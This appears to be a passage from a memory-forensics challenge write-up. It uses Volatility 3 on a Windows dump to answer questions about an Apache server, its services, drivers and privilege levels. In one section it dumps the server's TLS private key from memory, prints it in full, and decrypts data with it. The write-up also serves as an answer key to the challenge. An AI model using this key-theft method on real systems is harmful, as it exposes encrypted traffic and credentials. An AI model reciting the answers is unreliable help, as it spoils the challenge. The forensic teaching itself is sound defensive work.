DataSectionObject 0xe78bf6e61b30 httpd.conf file.0xe78bf6e61b30.0xe78bf66e0450.DataSectionObject.httpd.conf.dat
With the file extracted, let's ask some questions
Q: What is the configured "ServerRoot" for the web server?
A: "C:/xampp/apache"
Q: What port is the server configured to listen on?
A: 80:
Q: What is the "User" name the server is configured to run as?
A: daemon
Q: What is the "Group" name the server is configured to run as?
A: daemon
Q: What is the "ServerAdmin" email address
A: postmaster@localhost
Q: What is the "ServerName"
A: ServerName localhost:80
Q: What is the path to the error log:
A: ErrorLog "logs/error.log"
Q: What is the current logging level configuration
A: LogLevel warn
Below shows the evidence for above:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --text --perl-regexp --ignore-case '^(ServerRoot|Listen|User|Group|ServerAdmin|ServerName|ErrorLog|LogLevel)' httpd_dump/file.0xe78bf6e61b30.0xe78bf66e0450.DataSectionObject.httpd.conf.dat
ServerRoot "C:/xampp/apache"
Listen 80
User daemon
Group daemon
ServerAdmin postmaster@localhost
ServerName localhost:80
ErrorLog "logs/error.log"
LogLevel warn
Let's attempt to steal the server's private key and its certificate. This way, we can decrypt any communication encrypted by this private key.
A similar compromised actually occurred at Microsoft Corp, where a signing key was stolen.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep --perl-regexp 'server\.key|server.crt'
0xe78bf79354a0 \xampp\apache\conf\ssl.crt\server.crt 216
0xe78bf7938510 \xampp\apache\conf\ssl.key\server.key 216
Create a directory to store the contents.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir ssl_dump
Grab the certificate first
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ssl_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf79354a0
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf79354a0 server.crt file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat
Confirm the certificate file
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ file ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat
ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat: PEM certificate
We see above is PEM (Privacy Enhanced Mail) file. These files may contain the public certificate or the entire SSL chain which may include the private and public keys, along with other information on root and intermediate certificates. Interesting start. This file is base64 encoded.
Confirming we were able to recover the first part.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat
-----BEGIN CERTIFICATE-----
MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
-----END CERTIFICATE-----
Well it looks like this only contains the public key certificate information. With this in place, time for some questions.
Q: What is the server "Certificate" "Serial Number"?
A: b5:c7:52:c9:87:81:b5:03
Q: What is the server "Certificate" "Validity" period:
A: Validity
Not Before: Nov 10 23:48:47 2009 GMT
Not After : Nov 8 23:48:47 2019 GMT
Q: What is the server "Certificate" "Subject"?
A: Subject: CN = localhost
Q: What "Public Key Algorithm" is used by the certificate?
A: Public Key Algorithm: rsaEncryption
Q: How many bits are used for the "Public-Key"
A: Public-Key: (1024 bit)
Q: What "Signature Algorithm" is used?
A: sha1WithRSAEncryption
Below provides the answer to these questions.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl x509 -in ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat -text -noout
Certificate:
Data:
Version: 1 (0x0)
Serial Number:
b5:c7:52:c9:87:81:b5:03
Signature Algorithm: sha1WithRSAEncryption
Issuer: CN = localhost
Validity
Not Before: Nov 10 23:48:47 2009 GMT
Not After : Nov 8 23:48:47 2019 GMT
Subject: CN = localhost
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (1024 bit)
Modulus:
00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a:
75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5:
9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75:
bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a:
f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa:
f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3:
67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40:
97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e:
67:7a:28:c9:a4:34:ff:19:ed
Exponent: 65537 (0x10001)
Signature Algorithm: sha1WithRSAEncryption
Signature Value:
6a:f1:f3:49:6c:f9:ba:68:5f:6f:f3:27:04:c6:b9:0c:bd:95:
37:34:be:f7:08:66:9a:9b:03:18:41:be:b9:1d:24:33:55:b6:
19:02:1d:54:71:c9:4f:21:5d:68:75:f3:81:52:41:41:c5:93:
c2:1a:7c:e2:7b:c7:4a:24:13:0c:14:9a:4f:a7:10:35:0a:6f:
6a:0f:d3:68:40:ff:48:44:29:9b:45:6a:0c:5c:29:7c:56:2e:
b9:f0:4b:bd:53:5b:2e:42:b1:6c:ad:97:c1:4b:ee:d1:1c:68:
2d:d0:4c:0b:ff:3d:1e:aa:d9:d2:9a:62:38:db:90:f9:7d:8c:
b7:11
Time to grab the private key
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ssl_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf7938510
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf7938510 server.key file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ file ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat
ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat: PEM RSA private key
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDBJdMn4+ytDYNqbedfmnUQI+KQnaBjlY8dQZpY1ZxjjFtzhpB5
zMPWo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDE
ayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQAB
AoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KK
gsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgk
nAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjd
Rq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8Ell5QxhSg7skrHSZ0cBPhyaLNDIZkn
3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmmcuMi2C9OwGI
rI+lx1Q8mK261NKJh7sSVwQikh5YQYLKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/
Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB7
72097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBW
Vm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9U
bjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs
-----END RSA PRIVATE KEY-----
This now proves that we have the private key. Peaking into the private key
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl rsa -in ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -noout -text | head --lines=10
Private-Key: (1024 bit, 2 primes)
modulus:
00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a:
75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5:
9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75:
bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a:
f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa:
f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3:
67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40:
97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e:
...
With the private and public key at hand. Here are your questions.
Q: Create and encrypt a file using the stolen key pair.
A: This is shown below.
Let's extract the public key from this file.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl rsa -in ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -pubout > mem_server_pub.pem
writing RSA key
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat mem_server_pub.pem
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDBJdMn4+ytDYNqbedfmnUQI+KQ
naBjlY8dQZpY1ZxjjFtzhpB5zMPWo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQ
IwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpru
U51jDmd6KMmkNP8Z7QIDAQAB
-----END PUBLIC KEY-----
Confirm it is the same as what we extracted above from the .pem file.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl rsa -in mem_server_pub.pem -pubin -text -noout
Public-Key: (1024 bit)
Modulus:
00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a:
75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5:
9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75:
bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a:
f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa:
f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3:
67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40:
97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e:
67:7a:28:c9:a4:34:ff:19:ed
Exponent: 65537 (0x10001)
Looks good! We saw we could get the public key directly from memory or by extract it from the PEM file which contained both the private and public key information.
Let's create a file to show we can now encrypt and decrypt with this private and public key pair.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ echo "Welcome to Nik's Total Recall 2024 Memory Forensics Challenge" > stolen_private_key.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat stolen_private_key.txt
Welcome to Nik's Total Recall 2024 Memory Forensics Challenge
Encrypting the file using the public key.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl pkeyutl -encrypt -inkey mem_server_pub.pem -pubin -in stolen_private_key.txt -out stolen_private_key.txt.enc
Verifying the encrypted data vs the unencrypted. Using xxd we see this communication is encrypted.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ xxd stolen_private_key.txt.enc
00000000: aafd f40c 5501 a1e7 c2d2 67c1 64a9 96bd ....U.....g.d...
00000010: 218f 4455 3927 4d48 bd06 5b60 8e68 f872 !.DU9'MH..[`.h.r
00000020: d3f7 1e59 a58f 59ca 02cc 2cdc c9a6 1fc0 ...Y..Y...,.....
00000030: 83cc a903 cbbe b2ca 12be 24f2 450a c788 ..........$.E...
00000040: 2f7b 0502 1780 c944 18a3 857e 599e a9a2 /{.....D...~Y...
00000050: 7dd3 5a1c 3806 ce2d 32d0 4662 d246 feeb }.Z.8..-2.Fb.F..
00000060: 1b87 254d 753c c681 97cb 4f4c cecb 9a43 ..%Mu<....OL...C
00000070: 67d8 7513 2fcd 39eb ad1d 1b00 b5a5 db91 g.u./.9.........
This is the before the file was encrypted.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ xxd stolen_private_key.txt
00000000: 5765 6c63 6f6d 6520 746f 204e 696b 2773 Welcome to Nik's
00000010: 2054 6f74 616c 2052 6563 616c 6c20 3230 Total Recall 20
00000020: 3234 204d 656d 6f72 7920 466f 7265 6e73 24 Memory Forens
00000030: 6963 7320 4368 616c 6c65 6e67 650a ics Challenge.
We can see above, we use the public key to encrypt the communication. Let's now use the recovered server's private key to decrypt this encrypted communication.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl pkeyutl -decrypt -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -in stolen_private_key.txt.enc > stolen_private_key.txt.dec
Here we go! We are now back to the original text.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat stolen_private_key.txt.dec
Welcome to Nik's Total Recall 2024 Memory Forensics Challenge
Hopefully, this helped you to understand how someone might have been able to steal a key from memory and then perform malicious actions as was done at Microsoft.
Moving on!
Looking at DLL for HTTPD process
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.dlllist.DllList --pid 10008 > httpd_dlllist.txt
Progress: 100.00 PDB scanning finished
Q: What path is the http image file/executable loaded from?
A: Image is loaded from "c:\xampp\apache\bin\httpd.exe"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ head httpd_dlllist.txt --lines=5
Volatility 3 Framework 2.5.2
PID Process Base Size Name Path LoadTime File output
10008 httpd.exe 0x7ff69ef60000 0xc000 httpd.exe c:\xampp\apache\bin\httpd.exe 2023-11-16 23:26:15.000000 Disabled
Looking Driver List
Here is a subset:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat drivers_scan.txt | head --lines=10
Volatility 3 Framework 2.5.2
Offset Start Size Service Key Driver Name Name
0xb9841ee78464 0x690064004e 0x610057 N/A N/A N/A
0xb9841ee78464 0x690064004e 0x610057 N/A N/A N/A
0xb9841ee8f31c 0x939800249370 0x249420 N/A N/A N/A
0xb9841ee8f31c 0x939800249370 0x249420 N/A N/A N/A
0xe78befeb8c20 0xf8021f400000 0x0 \Driver\ACPI_HAL ACPI_HAL \Driver\ACPI_HAL
0xe78befeb8e30 0xf8021f400000 0x0 \Driver\WMIxWDM WMIxWDM \Driver\WMIxWDM
.......
Q: How many unique Devices Drivers "Name" do we have listed. Including the full path and ignoring any "N/A" and non-ASCII characters?
A: 155
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat drivers_scan.txt | awk --field-separator=' ' '{ print $6 }'| sort --unique | sed '1,2d' | head --lines=-3 | wc --lines
155
Looking at the service SIDs.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getservicesids.GetServiceSIDs > service_sids.txt
Progress: 100.00 PDB scanning finished
Earlier, we saw at the beginning, we identified the tool used to perform this memory capture. This tool was installed as a service.
Q: What is the service SIDs associated with this tool/software?
A: S-1-5-80-799667949-3218159461-2708755627-866028366-136143606 DumpIt
Q: When analyzing the PowerShell history there was a search for an executable via the "dir" command. What is the device driver used by this software for "packet capture (and sending) library"?
A: S-1-5-80-1676788727-3510623216-988961428-862518577-4183329668 npcap
S-1-5-80-3864102162-464399774-2857244265-230461771-3046054788 npcap_wifi
Q: What is/are the service ID(s) associated with the SSH we learned about earlier?
A: S-1-5-80-3847866527-469524349-687026318-516638107-1125189541 sshd
All answers can be found here:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat service_sids.txt | grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh'
S-1-5-80-799667949-3218159461-2708755627-866028366-136143606 DumpIt
S-1-5-80-1676788727-3510623216-988961428-862518577-4183329668 npcap
S-1-5-80-3864102162-464399774-2857244265-230461771-3046054788 npcap_wifi
S-1-5-80-2277354432-2697620045-1656008878-1855416240-261295475 ssh-agent
S-1-5-80-3847866527-469524349-687026318-516638107-1125189541 sshd
Q: What is path of the file associated with these drivers
Aggregate all the modules.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.modscan.ModScan > modscan.txt
Progress: 100.00 PDB scanning finished
A: Nothing returned for ssh. However, we have the other two returned their paths
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh' modscan.txt
0xe78bf0831710 0xf802266b0000 0x13000 npcap.sys \SystemRoot\system32\DRIVERS\npcap.sys Disabled
0xe78bf49f58e0 0xf802469f0000 0x14000 DumpIt.sys \??\C:\Windows\system32\Drivers\DumpIt.sys Disabled
Alternatively, we could have gotten this information from:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh' modules.txt
0xe78bf0831710 0xf802266b0000 0x13000 npcap.sys \SystemRoot\system32\DRIVERS\npcap.sys Disabled
0xe78bf49f58e0 0xf802469f0000 0x14000 DumpIt.sys \??\C:\Windows\system32\Drivers\DumpIt.sys Disabled
Still with the tool used to get this memory capture.
Q: Where was the memory capturing tool launched from?
A: "\TOOLS\DumpIt.exe"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.ldrmodules.LdrModules --pid 5652
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Pid Process Base InLoad InInit InMem MappedPath
...
5652 DumpIt.exe 0x7ff7da2c0000 True False True \TOOLS\DumpIt.exe
Alternatively, we could have used.
Q: How many modules were loaded/used by this tool to when loading?
A: There are 39 files in total used by Dumpit
Write the information out to a file:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.ldrmodules.LdrModules --pid 5652 > 5652_dumpit.txt
Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat 5652_dumpit.txt | sed '1,4d' | wc --lines
39
Revisiting persistence. Looking at the services on the system.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.svcscan > svcscan.txt
Progress: 100.00 PDB scanning finished
Q: How many services were on this system at the time of the capture?
A: There are 825 services on the system:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$cat svcscan.txt | sed '1,4d' | wc --lines
825
Q: What are their different service states and their counts?
A: Below shows the two states and their counts.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$cat svcscan.txt | awk --field-separator=' ' '{ print $5 }' | sort | uniq --count | sort | tail --lines=2
361 SERVICE_RUNNING
464 SERVICE_STOPPED
Q: What are the different service "start" modes and their counts?
A:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat svcscan.txt | awk --field-separator=' ' '{ print $4 }' | sort | uniq --count | sort --numeric-sort --reverse
566 SERVICE_DEMAND_START
165 SERVICE_AUTO_START
47 SERVICE_BOOT_START
32 SERVICE_SYSTEM_START
15 SERVICE_DISABLED
Q: What is/are the current state(s) of the service(s) on the system and their counts?
A:
Different Service "Type"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat svcscan.txt | awk --field-separator=' ' '{ print $6 }' | sort | uniq --count | sort --numeric-sort --reverse
352 SERVICE_KERNEL_DRIVER
180 SERVICE_WIN32_SHARE_PROCESS
150 SERVICE_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS
100 SERVICE_WIN32_OWN_PROCESS
40 SERVICE_FILE_SYSTEM_DRIVER
3
2 SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS
1 Type
1 SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS
Previously, you needed to find the driver associated with "capturing and (sending) packets".
Q: How is this driver configured to start, what was its state at the time of capture, what type of driver is it and what memory offset can it be found at?
A: Answer is here for all.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat svcscan.txt | grep npcap
0x2152b86a460 328 N/A SERVICE_SYSTEM_START SERVICE_RUNNING SERVICE_KERNEL_DRIVER npcap Npcap Packet Driver (NPCAP)
Similarly to the previous question, we saw the system was listening on port 22 at the time of capture.
Q: What was the servicename, state, start, type and name for the service listening on this port.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --ignore-case 'sshd' svcscan.txt
0x2152b887240 462 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_OWN_PROCESS sshd OpenSSH SSH Server -
0x2152b8888f0 462 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_OWN_PROCESS sshd OpenSSH SSH Server
We started looking at ncat.exe earlier in this process and spent a reasonable amount of time on it, so let's go back to looking at permissions.
Q: What "integrity level" is the ncat.exe process running at?
A: Medium Mandatory Level
Q: Is the user who was logged on at the time this capture was taken part of the "Domain Users" group?
A: Yes.
Q: Is the user who was logged on at the time this capture was taken part of the "Domain Admins" or "Enterprise Admin" group?
A: No
Q: Is the user who was logged on at the time this capture was taken part of the local "Administrators" group?
A: Yes.
896 ncat.exe S-1-5-114 Local Account (Member of Administrators)
896 ncat.exe S-1-5-32-544 Administrators
Q: What type of authentication mechanism is the user of this process using? eg. LM, NTLM, Kerberos, Digest, SChannel?
A: NTLM Authentication
896 ncat.exe S-1-5-64-10 NTLM Authentication
Below answers all the questions.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids --pid 896
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process SID Name
896 ncat.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik
896 ncat.exe S-1-5-21-1563833629-3224366856-3602044515-513 Domain Users
896 ncat.exe S-1-1-0 Everyone
896 ncat.exe S-1-5-114 Local Account (Member of Administrators)
896 ncat.exe S-1-5-32-544 Administrators
896 ncat.exe S-1-5-32-545 Users
896 ncat.exe S-1-5-4 Interactive
896 ncat.exe S-1-2-1 Console Logon (Users who are logged onto the physical console)
896 ncat.exe S-1-5-11 Authenticated Users
896 ncat.exe S-1-5-15 This Organization
896 ncat.exe S-1-5-113 Local Account
896 ncat.exe S-1-5-5-0-1032752 Logon Session
896 ncat.exe S-1-2-0 Local (Users with the ability to log in locally)
896 ncat.exe S-1-5-64-10 NTLM Authentication
896 ncat.exe S-1-16-8192 Medium Mandatory Level
Earlier we saw there is a PowerShell History log.
Also, here is the evidence from the process list that PowerShell was running at the time this capture was taken.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | grep powershell
2992 1548 powershell.exe 0xe78bf3d6e0c0 0 - 0 False 2023-11-16 19:18:05.000000 2023-11-16 19:18:06.000000 Disabled
2252 2992 powershell.exe 0xe78bf435f0c0 0 - 0 False 2023-11-16 19:18:06.000000 2023-11-16 22:01:47.000000 Disabled
4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A Disabled
644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A Disabled
4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A Disabled
4120 5508 powershell.exe 0xe78bf6961080 0 - 0 False 2023-11-16 22:08:06.000000 2023-11-16 22:08:31.000000 Disabled
Q: What "Integrity Level" is being used by this/these "powershell.exe"?
A: There are three powershell.exe at PIDs 2992,2252 and 4120 which are running at System Level privileges.
Q: What is/are the PID of the powershell.exe(s) with the highest "Integrity Level"?
A: 2992, 4120
Q: What is the "Integrity Level SID" for this "Integrity Level"?
A: S-1-16-16384
Q: What other "Integrity Levels" have we seen powershell.exe running with?
A: High Mandatory Level
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids --pid 2992 2252 4728 644 4852 4120 | grep --ignore-case Mandatory
2992 powershell.exe S-1-16-16384 System Mandatory Level
2252 powershell.exe S-1-16-16384 System Mandatory Level
4728 powershell.exe S-1-16-12288 High Mandatory Level
644 powershell.exe S-1-16-12288 High Mandatory Level
4852 powershell.exe S-1-16-12288 High Mandatory Level
4120 powershell.exe S-1-16-16384 System Mandatory Level
Well that's its for this challenge!
With the understanding above, and if you completed the tasks above, these bonus questions should be relatively easy.
Bonus question 1: Decrypt the file "encrypted_w_priv_key.enc" to find the phrase that pays.
Here is how I encrypted the file using the private key, which means you need to use the public key to decrypt.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ echo 'PHRASE THAT PAYS:**public_key_decrypted**' | openssl pkeyutl -inkey ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -sign -out encrypted_w_priv_key.enc
As always, I can verify the file's content is encrypted.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ hexdump --canonical encrypted_w_priv_key.enc
00000000 60 8a d3 84 6f 04 b3 4e 50 58 8a cd 59 88 1b e1 |`...o..NPX..Y...|
00000010 78 fb 5c 85 25 9a c9 4e da ad 64 ee 51 a1 3d 4b |x.\.%..N..d.Q.=K|
00000020 61 aa 44 4f a8 f9 92 9c 7d b6 5d 7b db c4 c1 83 |a.DO....}.]{....|
00000030 69 e5 6d 4a 79 b3 12 e8 fe fb bf 09 2a 5e 6f f6 |i.mJy.......*^o.|
00000040 37 52 01 84 df c6 01 31 ec d0 61 d0 a2 6f e7 46 |7R.....1..a..o.F|
00000050 ad 7a e6 b8 8d 89 31 1c fa 0c 65 35 65 74 21 d2 |.z....1...e5et!.|
00000060 77 d0 96 87 da e5 1b 3a 1f cf ae 40 27 cd 3f 31 |w......:...@'.?1|
00000070 f1 c2 3a 64 a7 9f 9a 98 59 f8 43 cf 09 75 19 88 |..:d....Y.C..u..|
00000080
Because we used the private key to encrypt, we need the public key to decrypt.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl rsautl -inkey mem_server_pub.pem -pubin -in encrypted_w_priv_key.enc -hexdump -verify
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
0000 - 50 48 52 41 53 45 20 54-48 41 54 20 50 41 59 53 PHRASE THAT PAYS
0010 - 3a 2a 2a 70 75 62 6c 69-63 5f 6b 65 79 5f 64 65 :**public_key_de
0020 - 63 72 79 70 74 65 64 2a-2a 0a crypted**.
Voila! There we go, we have decrypted the contents. I could have redirected it out to a file instead if needed such as.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ openssl rsautl -inkey mem_server_pub.pem -pubin -in encrypted_w_priv_key.enc -verify --out decrypted.txt
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat decrypted.txt
PHRASE THAT PAYS:**public_key_decrypted**
